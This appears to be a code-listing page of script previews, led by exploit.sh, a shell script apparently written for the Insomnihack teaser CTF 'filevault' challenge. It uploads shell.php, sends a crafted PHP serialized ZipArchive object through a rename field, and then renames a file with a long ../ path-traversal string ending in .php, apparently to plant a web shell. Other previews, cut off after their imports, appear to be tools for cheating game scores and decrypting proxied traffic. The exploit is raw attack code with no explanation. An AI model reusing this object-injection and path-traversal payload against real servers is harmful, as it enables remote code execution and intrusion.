View exploit.sh
#!/bin/bash
URL="http://filevault.teaser.insomnihack.ch"
SANDBOX_DIR="827bfe788a9d99ceecaef263c52e34a1570c8349"
curl -c cookie.txt "$URL/?action=reset"
curl -b cookie.txt -c cookie.txt "$URL/?action=upload" -F "vault_file=@shell.php"
curl -b cookie.txt -c cookie.txt "$URL/?action=upload" -F "vault_file=@shell.php"
curl -b cookie.txt -c cookie.txt "$URL/?action=changename&i=1" -d 'newname=;s:8:"realname";s:9:"aaaaaaaaa";}i:1;O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"realname";i:8;s:8:"filename";s:67:"'
curl -b cookie.txt -c cookie.txt "$URL/?action=changename&i=0" -d "newname=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../.php"
View reset_marathon.py
import hashlib
import hmac
import json
import sys
import urlparse
import requests
from Crypto.Cipher import AES
def xor(a, b):
View cheat_score_2.py
import hashlib
import hmac
import json
import sys
import urlparse
import requests
from Crypto.Cipher import AES
def xor(a, b):
View cheat_score.py
import hashlib
import hmac
import json
import sys
import urlparse
import requests
from Crypto.Cipher import AES
def xor(a, b):
View gacha.py
import hashlib
import hmac
import json
import sys
import urlparse
import requests
from Crypto.Cipher import AES
def xor(a, b):
View mitmproxy_decrypt.py
# mitmdump -s mitmproxy_decrypt.py
import hashlib
import json
import sys
from mitmproxy import ctx
from Crypto.Cipher import AES
def xor(a, b):
res = ''
View compare.py
import re
import requests
import urlparse
from bs4 import BeautifulSoup
def is_number(s):
if not s.isdigit():
raise argparse.ArgumentTypeError('{0} is not a number'.format(s))
return s
View compare.py
import requests
import urlparse
from bs4 import BeautifulSoup
def is_number(s):
if not s.isdigit():
raise argparse.ArgumentTypeError('{0} is not a number'.format(s))
return s
def get_content(url, team):
View befunge.py
import random
import sys
class Stack:
def __init__(self):
self.stack = []
def append(self, v):
self.stack.append(v)